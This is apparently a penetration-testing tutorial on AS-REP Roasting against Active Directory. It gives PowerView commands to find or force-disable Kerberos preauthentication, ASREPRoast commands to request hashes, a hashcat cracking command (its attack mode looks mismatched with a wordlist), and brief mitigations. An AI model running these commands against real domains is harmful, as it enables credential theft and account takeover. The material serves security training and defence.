AS-REP Roasting is a technique that exploits a weakness in the Kerberos protocol during initial authentication with the key distribution centre(KDC)
During the authentication stage, a user requests a Ticket Granting Ticket (TGT) from the KDC in the form of an AS-REQ packet.If the account exists, the KDC will return a TGT encrypted with the account’s credentials, meaning that only a valid user or machine possessing the valid credentials is able to decrypt the ticket.
Any user who is able to make a request to the KDC can also request a TGT for any arbitrary user. That allows an attacker to receive an encrypted ticket which can then be brute forced offline to retrieve the password.
If a user’s UserAccountControl settings have “Do not require Kerberos pre authentication” enabled i.e. Kerberos preauth is disabled, it is possible to grab the user’s crackable AS-REP and brute-force it offline.
Enumerating accounts with Kerberos Preauth disabled using Powerview
Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
if we want to check for a specific user we can do
Get-DomainUser username | ConvertFrom-UACValueand check if it has DONT_REQ_PREAUTH property
In case we don’t have preauth disabled but we have GenericWrite or GenericAll rights.We can force kerberos preauth disabled. To do so we need to add 4194304(dont_req_preauth) property flag on the user.
Set-DomainObject -Identity username -XOR @{useraccountcontrol=4194304} -Verbose
Request encrypted AS-REP for offline brute force.
We will use ASREPRoast but you can do it with Rubeus too.
Get-ASREPHash function, wraps New-ASReq to generate the appropriate AS-REQ for a given user/domain, enumerates the DC for the passed domain and sends the crafted AS-REQ and receives the response bytes
Get-ASREPHash -Domain domain -UserName username -Verbose
We can also use the Invoke-ASREQRoast function to find all the users that don’t require kerberos preauthentication:
Invoke-ASREQRoast -Verbose | fl
Cracking AS-REP Hashes with HashCat
we need to add 23 after the $krb5asrep like this:
$krb5asrep$23$admin@first.local:….
and crack it
! hashcat -m 18200 -a 3 -O '$krb5asrep$23$admin@first.local:...' /path/to/wordlist
Mitigation
To defend against ASRepRoasting you need to search and identify for user accounts that are set to not require Kerberos pre-authentication and remove any instances of it. You can find these accounts by using a LDAP filter query
Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
Another countermeasure is the use of long, complex passwords that are not found in breached wordlists, to make it harder for the attacker to crack them.